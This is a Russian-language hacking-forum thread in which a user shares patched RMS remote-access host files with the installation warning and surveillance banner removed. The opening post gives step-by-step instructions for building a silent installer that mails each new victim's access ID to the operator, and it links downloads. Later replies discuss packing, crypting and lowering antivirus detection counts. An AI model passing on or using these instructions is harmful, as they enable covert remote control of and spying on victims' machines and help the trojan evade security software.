Чищеные файлы RMS-host 6.3.0.1 (без ID и вебки)

Тема в разделе "Трояны и шпионские программы", создана пользователем dencikkkk, 7 ноя 2015.

↑ ↓
  1. dencikkkk Житель форума
    dencikkkk
    Ответить в чате

    Форумчанин

    Регистрация:
    29.07.2015
    Сообщения:
    48
    Симпатии:
    12
    Репа:
    +14 / 0 / -2
    Пропатченые файлы от RMS Host 6.3.0.1.
    Убрано окно предупреждения об отправки ID на мыло и банер видеонаблюдения. Файлы упакованы UPX . Частично закриптован (ибо мне в лом )))))
    Нужный вьювер идет в комплекте ...
    Установка

    Конфигурируем под себя MSI
    1. Устанавливаем вьюевер 6.3.0.1
    2. Запускаем его и на вкладке "Инструменты" кликаем по значку "MSI конфигуратор"
    3. Появляется окно, в котором указываем путь к пререпакованому host6.3ru.msi и жмем кнопку ДАЛЕЕ
    4. В следующем окне выбираем "Дистрибутив One-Click", жмем ДАЛЕЕ
    5. В следующем окне ставим птичку "Получить новый Internet ID", указываем мыло, на которое будут приходить ID. Также можете поставить птичку "Сгенерировать новый пароль" (если не хотите делать постоянный статистический пароль).
    6. Переходим на вкладку "Другое" и просталяем все возможные птички. Жмем ДАЛЕЕ.
    7. В следующем окошке менять ни чего не надо, жмем ДАЛЕЕ.
    8. Появляется окошко сохранения конфигурированого MSI. Сохраняем под именем host6.3ru_mod.msi (обязательно под этим именем, так как упаковщик настроен под него)
    9. Появляется маленькое окошко настройки хоста. Если вам нужен статистический пароль переходим в меню "Безопастность" устанавливаем свой пароль, перед этим нажав на кнопку "Сменить/Установить пароль". Больше нам тут ни чего не надо Жмем "ОК".
    Если вам не нужен статистический пароль, то просто пропускаем этот пункт!
    10. Переходим в меню "Настройки", на первой вкладке оставляем только вторую с верху галочку, первую галочку не забываем снять. На остальных вкладках снимаем все галочки. Жмем "ОК"
    11. появляется предуприждение что нужно перезагрузить хост, жмем "ОК" и закрываем окно настройки хоста.
    12. Через пару секунд появится окно сохранения готового RMS.exe, нам этот файл уже не нужен, так как к этому моменту файл host6.3ru_mod.msi уже полностью сконфигурирован. Нажимаем ОТМЕНА
    ======
    Если хотите заменить файлы в .msi , то вот инструкция : https://xaker.name/threads/25455/
    Однако поправка : -Сначала откроем дистрибутив сервера RMS в Orca. Не будем ничего менять. Наживаем File - Save as..- , тут не прально : Открываете .msi в Orca ->заходите в колонку File -> удалите от туда все файлы -> сохраните. Для начала все файлы надо распаковать 7ip и положить в отдельную папку .
    ======

    Упаковываем
    Вот мы и сконфигурировали наш перепакованый MSI. Распаковываем скачаный архив с упаковщиком. В нем находится папка "Paker". Ложим в эту папку сконфигурированый host6.3ru_mod.msi, запускаем файл make_installer.cmd и получаем готовую сборку Setup.exe. Тихую как таракан, пошуршит жестким диском чуток и все. В полученой сборе нету защиты от повторного запуска, сами допишите если нужно в начале файла install.cmd. Иначе сборка будет при каждом запуске переустанавливаться и присылать новый ID. Свой вариант install.cmd не дам. Если порыться в файлах упаковщика, можно много варианов сборки придумать, в том числе отказаться от MSI и сделать склейку с другим файлом. Все в ваших руках, и зависит только от вашей фантазии и ума.

    Скачать : https://yadi.sk/d/Ts2r4rAZkHZax
    *не бейте* Скачать с гавнофайлообменника : (установится дополнительное ПО ) http://disk-space.ru/download/c9ed93c40a/HOST.rar.html/
    ...............
    Ну вот вобщем то ) теперь вам не надо еб*ться с вопросом , о том как же обойти эти сранные окошки ))
    ..............
    Ну , и как обычно : Царь Думки думаю!!!
     
    • Мне нравится Мне нравится x 2
  2. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
  3. shtraus Житель форума
    shtraus
    Ответить в чате

    Форумчанин

    Регистрация:
    22.10.2015
    Сообщения:
    47
    Симпатии:
    3
    Пол:
    Мужской
    Репа:
    +3 / 0 / -0
    После сохранения конфигурированого MSI появляется окошко host 6.3 не является актвальным дестрибьютивом Rms Host
     
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.800
    Симпатии:
    425
    Пол:
    Мужской
    Репа:
    +957 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Ничего странного нет, всё зависит как постороены эти сканеры, т.е. можно сканить лишь сигнатурно не распаковывая файл, скорей-всего так refud.me и делает, либо по весу какие-то ограничения, лучше всех проверяет VT, но многие его не любят, т.к. сливается инфа, а всякие другие сканеры, которые якобы не сливают, часто врут, т.е. детект могут не показывать, а на самом деле детект есть, либо при запуске !смех-смех!!!
     
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.800
    Симпатии:
    425
    Пол:
    Мужской
    Репа:
    +957 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    На UPX может-быть детект кстати у некоторых АВ, лучше пакуйте сами если это нужно, непонятно зачем это в сборке, также как и криптовать не нужно, лишнее палево...

    Кому надо сами наверное закриптуют, ИМХО !
     
  6. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Я когда криптор чистил стаб UPX упаковал после чистки был 12/35 стал 4/35
     
  7. shtraus Житель форума
    shtraus
    Ответить в чате

    Форумчанин

    Регистрация:
    22.10.2015
    Сообщения:
    47
    Симпатии:
    3
    Пол:
    Мужской
    Репа:
    +3 / 0 / -0
    Создался Setup.exe и что дальше?
    Пытаюсь его проинсталировать не открывается
     
  8. shtraus Житель форума
    shtraus
    Ответить в чате

    Форумчанин

    Регистрация:
    22.10.2015
    Сообщения:
    47
    Симпатии:
    3
    Пол:
    Мужской
    Репа:
    +3 / 0 / -0

    У меня почему то не получается, а можете сделать видео пожалуйста?
     
  9. dobaa Житель форума
    dobaa
    Ответить в чате

    Форумчанин

    Регистрация:
    18.07.2014
    Сообщения:
    28
    Симпатии:
    12
    Пол:
    Мужской
    Репа:
    +16 / 0 / -0
    Ты очень невнимателен ,бро надо нажимать первый пункт при создании инсталятора ,а ты жмешь второй и поэтому создается exe а не msi
     
  10. shtraus Житель форума
    shtraus
    Ответить в чате

    Форумчанин

    Регистрация:
    22.10.2015
    Сообщения:
    47
    Симпатии:
    3
    Пол:
    Мужской
    Репа:
    +3 / 0 / -0
    Ну так я нажимала тут В следующем окне выбираем "Дистрибутив One-Click", жмем ДАЛЕЕ так как описано выше
    Все правильно, или я снова не туда занесло меня?
     

Поделиться этой страницей